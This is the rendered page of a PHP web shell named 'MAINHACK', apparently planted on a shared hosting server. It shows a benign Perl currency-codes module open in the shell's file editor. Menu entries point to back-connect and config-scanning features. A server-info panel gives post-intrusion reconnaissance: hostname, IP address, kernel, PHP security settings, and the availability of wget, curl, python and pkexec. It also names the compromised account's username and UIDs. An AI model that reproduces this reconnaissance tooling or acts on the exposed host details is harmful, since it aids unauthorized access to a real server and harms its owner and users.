[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Currency.pm
File is not writable. Editing disabled.
package Locale::Codes::Currency; # Copyright (C) 2001 Canon Research Centre Europe (CRE). # Copyright (C) 2002-2009 Neil Bowers # Copyright (c) 2010-2018 Sullivan Beck # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. # This file was automatically generated. Any changes to this file will # be lost the next time 'gen_mods' is run. # Generated on: Wed May 30 10:22:15 EDT 2018 use strict; use warnings; require 5.006; use Exporter qw(import); our($VERSION,@EXPORT); $VERSION = '3.57'; ################################################################################ use if $] >= 5.027007, 'deprecate'; use Locale::Codes; use Locale::Codes::Constants; @EXPORT = qw( code2currency currency2code all_currency_codes all_currency_names currency_code2code ); push(@EXPORT,@Locale::Codes::Constants::CONSTANTS_CURRENCY); our $obj = new Locale::Codes('currency'); $obj->show_errors(0); sub show_errors { my($val) = @_; $obj->show_errors($val); } sub code2currency { return $obj->code2name(@_); } sub currency2code { return $obj->name2code(@_); } sub currency_code2code { return $obj->code2code(@_); } sub all_currency_codes { return $obj->all_codes(@_); } sub all_currency_names { return $obj->all_names(@_); } sub rename_currency { return $obj->rename_code(@_); } sub add_currency { return $obj->add_code(@_); } sub delete_currency { return $obj->delete_code(@_); } sub add_currency_alias { return $obj->add_alias(@_); } sub delete_currency_alias { return $obj->delete_alias(@_); } sub rename_currency_code { return $obj->replace_code(@_); } sub add_currency_code_alias { return $obj->add_code_alias(@_); } sub delete_currency_code_alias { return $obj->delete_code_alias(@_); } 1;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server306.web-hosting.com
Server IP: 192.64.117.220
PHP Version: 8.2.31
Server Software: LiteSpeed
System: Linux server306.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 138.28 GB
HDD Free: 102.25 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: awodbsau
User ID (UID): 4522
Group ID (GID): 4521
Script Owner UID: 4522
Current Dir Owner: N/A